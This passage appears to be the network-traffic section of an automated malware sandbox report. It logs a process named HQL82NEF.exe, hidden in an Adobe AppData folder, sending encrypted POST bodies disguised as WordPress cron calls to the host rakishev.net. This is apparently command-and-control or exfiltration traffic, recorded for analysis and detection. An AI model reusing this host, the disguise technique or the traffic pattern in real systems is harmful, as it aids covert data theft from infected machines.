2023-10-03 20:36:58 UTC	3127	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:36:59 UTC	3238	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJouRrM39DE0dqCi%2B8WZRHncdBS2CaUDxzZk92oG95bMST8oChJuOkspI8yMVr5BNFn7EabC9j2UL97Vsv%2BfUMqkKDdVS3f6D5TJsH10up1drXsx7%2Fn1z8J8WNh%2BPfE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fafa892b05b0-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49878	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:58 UTC	3127	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 326 Expect: 100-continue
2023-10-03 20:36:58 UTC	3128	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:58 UTC	3128	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:58 UTC	3128	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 68 66 52 54 4a 71 35 66 32 43 55 35 57 59 41 76 43 55 25 32 42 6a 32 31 64 44 77 4a 59 71 6d 52 74 58 73 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQhfRTJq5f2CU5WYAvCU%2Bj21dDwJYqmRtXs7T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjy
2023-10-03 20:36:59 UTC	3239	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hGXwdURBAiY%2FpOe%2BY6HdijH6VEWUpsCH3MgycVMqabDU1oqNXqccxjOfteuAcp6UrEM%2FBhYwCpCZWjjV1159EVTGl5CAA%2F75Q40XKeF7CMVNmZHgmdEQ4HF115tPYPQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fafaad2f81d6-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49879	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:58 UTC	3127	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112852 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:36:58 UTC	3128	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:58 UTC	3128	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:58 UTC	3128	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 42 7a 6a 46 35 72 50 77 67 54 5a 75 47 6c 71 44 4f 75 57 31 6c 49 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUBzjF5rPwgTZuGlqDOuW1lIIMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:36:58 UTC	3144	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:36:58 UTC	3144	OUT	Data Raw: 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 35 44 Data Ascii: wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP5D
2023-10-03 20:36:58 UTC	3160	OUT	Data Raw: 37 Data Ascii: 7
2023-10-03 20:36:58 UTC	3160	OUT	Data Raw: 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 2f 59 Data Ascii: PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP/Y
2023-10-03 20:36:58 UTC	3176	OUT	Data Raw: 5a Data Ascii: Z
2023-10-03 20:36:58 UTC	3176	OUT	Data Raw: 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d 6e 71 Data Ascii: SCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBomnq
2023-10-03 20:36:58 UTC	3192	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:36:58 UTC	3192	OUT	Data Raw: 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 76 4f Data Ascii: MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4vO
2023-10-03 20:36:58 UTC	3208	OUT	Data Raw: 61 Data Ascii: a
2023-10-03 20:36:58 UTC	3208	OUT	Data Raw: 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 44 71 Data Ascii: cyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fihDq
2023-10-03 20:36:58 UTC	3224	OUT	Data Raw: 45 Data Ascii: E
2023-10-03 20:36:58 UTC	3224	OUT	Data Raw: 7a 39 50 31 5a 31 36 37 35 63 4c 45 50 42 33 53 49 66 35 75 47 79 6e 4a 36 5a 37 4c 44 6d 54 58 47 6d 63 46 42 53 4e 52 46 74 4b 7a 52 49 58 31 66 4c 38 31 61 75 43 52 34 58 47 50 4b 41 5a 43 57 6f 4f 75 4c 5a 6d 59 6f 47 45 78 6d 69 76 4d 6d 25 32 42 69 68 65 65 43 30 41 52 50 45 44 46 4b 33 6f 67 58 6f 64 47 49 73 57 45 4d 6d 79 35 74 44 44 2f 79 46 44 44 41 74 49 7a 62 6a 74 69 58 61 4d 6b 56 54 43 69 68 6a 39 59 75 36 30 43 67 46 39 36 6d 4e 37 77 53 4b 46 50 63 6a 52 45 48 75 4d 7a 6c 51 4f 4c 73 59 34 33 75 4f 4f 47 66 72 63 54 61 69 65 32 37 4b 77 6c 6f 46 5a 7a 7a 77 6f 73 44 48 34 35 42 78 30 62 35 79 52 4f 69 78 41 44 61 77 47 59 67 49 46 55 44 48 35 64 6e 4f 54 4d 70 74 74 4c 69 33 51 69 71 78 38 5a 55 32 4e 6d 4f 59 67 2f 49 38 41 38 76 66 37 Data Ascii: z9P1Z1675cLEPB3SIf5uGynJ6Z7LDmTXGmcFBSNRFtKzRIX1fL81auCR4XGPKAZCWoOuLZmYoGExmivMm%2BiheeC0ARPEDFK3ogXodGIsWEMmy5tDD/yFDDAtIzbjtiXaMkVTCihj9Yu60CgF96mN7wSKFPcjREHuMzlQOLsY43uOOGfrcTaie27KwloFZzzwosDH45Bx0b5yROixADawGYgIFUDH5dnOTMpttLi3Qiqx8ZU2NmOYg/I8A8vf7
2023-10-03 20:36:59 UTC	3239	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3YxdqYY5pFkg%2BC5mzHa2ALPzL4QLwy4DsnCpvIwtybmQEEzg3xrBrjh227x9dQAH8gjVYRgN%2F%2BPnaVyllWtnhd7XosdhsOHUPGaf12khDC1rFobAXM9aJZGLnkT3ZaU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fafab8969c66-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49882	104.21.88.34	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:33 UTC	3240	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:37:33 UTC	3241	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:33 UTC	3241	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:33 UTC	3241	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:37:34 UTC	3352	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gIdGFExWxin323ro1X3%2Bf9tsTmnGoBIRUC4meeh8bmrJmFJlz9g%2FK4ysVgoYTYXZ89E3g8Is22AtHGnpyQEZFywRa75wC63k112VzM4J8au4Dqp7H7CzrsEkFUmA4eA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fbd64a3b3ae1-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49881	104.21.88.34	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:33 UTC	3240	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 324 Expect: 100-continue
2023-10-03 20:37:33 UTC	3241	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:33 UTC	3241	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:33 UTC	3241	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 68 66 52 54 4a 71 35 66 32 43 55 76 38 53 37 36 72 53 50 48 6c 48 43 34 41 44 66 6d 6b 66 41 70 38 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 64 59 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQhfRTJq5f2CUv8S76rSPHlHC4ADfmkfAp87T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjydY
2023-10-03 20:37:34 UTC	3352	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oX2VhrklfUgy8wkXB7kz%2FPrMFxvi1bRQFNshDGBkcfqO66tgTNOQ2bYJGsXJ8m03G75KWqdq3BBCgAyqpchhZT7JaE0DbS16dS4JmaBuCL1EeZ%2BkjJv67hiSuMPYpis%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fbd658093982-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.4	49883	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:33 UTC	3241	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112852 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:37:33 UTC	3241	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:33 UTC	3241	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:33 UTC	3241	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 62 2f 6b 6f 34 66 42 47 69 59 67 53 35 47 4f 6f 55 46 63 62 73 6f 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUb/ko4fBGiYgS5GOoUFcbsoIMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:37:33 UTC	3257	OUT	Data Raw: 49 Data Ascii: I
2023-10-03 20:37:33 UTC	3257	OUT	Data Raw: 63 45 5a 69 6b 52 46 63 30 30 34 57 62 41 4c 4a 53 64 71 39 71 4d 58 5a 74 25 32 42 68 45 76 74 4f 4a 58 69 4f 6b 4d 5a 32 6a 36 75 59 70 45 67 67 42 54 44 54 70 4d 32 59 43 2f 52 34 4f 4c 71 44 25 32 42 45 62 70 69 45 76 38 66 79 39 4e 79 55 37 39 31 44 45 48 36 67 55 50 6d 72 4c 67 71 72 4b 69 31 76 6f 62 50 56 76 79 41 38 25 32 42 4f 63 4e 38 79 45 54 41 68 77 6a 49 63 6e 35 68 48 6c 52 53 52 61 57 4f 54 4d 35 6f 6a 37 57 73 37 4e 46 4a 61 4e 38 30 51 75 53 6a 4e 65 73 43 35 37 53 6d 42 4a 51 58 41 55 75 65 4e 51 54 4f 47 71 52 63 68 7a 4d 64 4b 62 39 65 47 57 71 70 6f 4c 67 76 46 79 30 47 57 72 42 58 79 75 51 77 71 63 74 75 4b 66 38 69 4e 46 44 70 52 54 7a 38 67 6b 5a 4b 52 48 4d 39 35 73 53 71 63 25 32 42 6d 6f 6c 74 49 6b 4c 70 59 25 32 42 64 38 52 Data Ascii: 